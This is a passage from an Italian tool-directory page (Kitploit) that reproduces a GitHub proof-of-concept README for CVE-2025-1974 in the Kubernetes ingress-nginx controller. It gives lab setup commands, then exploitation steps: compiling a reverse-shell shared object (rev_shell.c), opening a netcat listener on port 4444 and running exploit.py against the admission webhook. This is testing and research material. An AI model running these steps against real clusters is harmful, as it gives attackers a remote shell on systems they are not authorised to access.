Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-1974 — Codice PoC CVE-2025-1974 | Kitploit
Strumenti/GitHubGitHub/zulloper/cve-2025-1974
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSicurezza Cloud
GitHubzulloper/cve-2025-1974

CVE-2025-1974

Codice PoC CVE-2025-1974

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-1974: Analisi della vulnerabilità di Kubernetes Ingress Nginx Controller e configurazione dell'ambiente PoC

Ambiente di test

  • MacOS (M2)
  • Ingress NGINX Controller 1.11.3
  • Rancher Desktop (Docker)
  • Minikube (Kubernetes)

Configurazione dell'ambiente di test locale (M2 MacOS)

Per il test locale installa minikube

minikube start --driver=docker

Configura ingress-nginx-controller con il seguente comando:

kubectl apply -f ingress-nginx-controller.yml

Port forwarding

Verifica che i Pod funzionino correttamente

kubectl get pods -n ingress-nginx

kubectl describe <pod name> -n ingress-nginx

Inoltra le porte 80 e 8443 (webhook) dei Pod alle porte locali 8888 e 1337 (è necessario il port forwarding sia della porta 80 che della 8443)

kubectl port-forward -n ingress-nginx <pod name> 8888:80

kubectl port-forward -n ingress-nginx <pod name> 1337:8443

Preparazione della so (shared object library)

Modifica l'IP e la porta della connessione della reverse shell in rev_shell.c

Compila in ambiente macOS (arm64); adatta la compilazione all'ambiente di test

aarch64-linux-gnu-gcc -shared -fPIC -o rev_shell.so rev_shell.c

root@kitploit:~
# 크로스컴파일러 설치
brew tap messense/macos-cross-toolchains
brew install aarch64-linux-gnu

Creazione dell'AdmissionReview (opzionale; è possibile usare anche i file già generati)

Converti in formato AdmissionReview con kube-review (json)

./kube-review-darwin-arm64 create admission_test.yml > admission_review_req_body.json

Exploit

Prepara la connessione della reverse shell con nc

nc -lv 4444

Modifica host e porta di nginx e webhook in exploit.py, quindi esegui

python3 exploit.py

img.png

Scarica lo strumento